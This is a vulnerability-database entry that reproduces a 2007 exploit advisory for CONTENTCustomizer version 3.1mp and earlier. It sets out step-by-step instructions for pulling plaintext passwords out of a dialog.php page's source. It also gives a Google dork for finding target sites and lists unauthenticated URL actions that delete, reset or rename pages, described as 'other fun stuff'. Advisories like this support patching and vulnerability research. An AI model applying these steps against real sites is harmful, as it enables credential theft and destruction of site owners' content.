Lucene search
contentcustom-disclose.txt
CONTENTCustomizer v 3.1mp Login Credentials Disclosure Vulnerability. Find page using ContentCustomizer, enter Vuln Page, view source, plaintext password in value field. Trick: Ctrl+Y brings login screen.
Show more
`CONTENTCustomizer <= v 3.1mp Login Credentials Disclosure Vulnerability
---------------------------------------
Author: d3hydr8
Homepage: darkc0de.com
Original Post: forum.darkc0de.com
---------------------------------------
Software: CONTENTCustomizer
Homepage: contentcustomizer.net
Version: <= v 3.1mp
Vuln Page: /dialog.php?action=editauthor&doc='+pagename
Method: Find a site using ContentCustomizer, get a page name you want to
edit. (index.php)
Fill it in with our Vuln Page "
http://example.com/generator/dialog.php?action=editauthor&doc=index.php"
In the form you will see the Username: (owner of the file) but the password
is in asterisk's, View Source
The password will be in the value= field in plaintext.
<td nowrap><input type=password name=newlocalpassword value="PASSWORD"
id=newlocalpassword style="width:160px;"></td>
Trick: Hit Ctrl+Y on a page that ContentCustomizer controls and it brings
you to the login screen ;)
Dork: inurl:"generator/default.php?doc="
Other fun stuff:
dialog.php?action=del&doc='+pagename // Delete
dialog.php?action=delbackup&doc='+pagename // Delete Backup
dialog.php?action=res&doc='+pagename // Reset
dialog.php?action=ren&doc='+pagename // Rename
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo26 Oct 2007 00:00Current
7.4High risk
Vulners AI Score7.4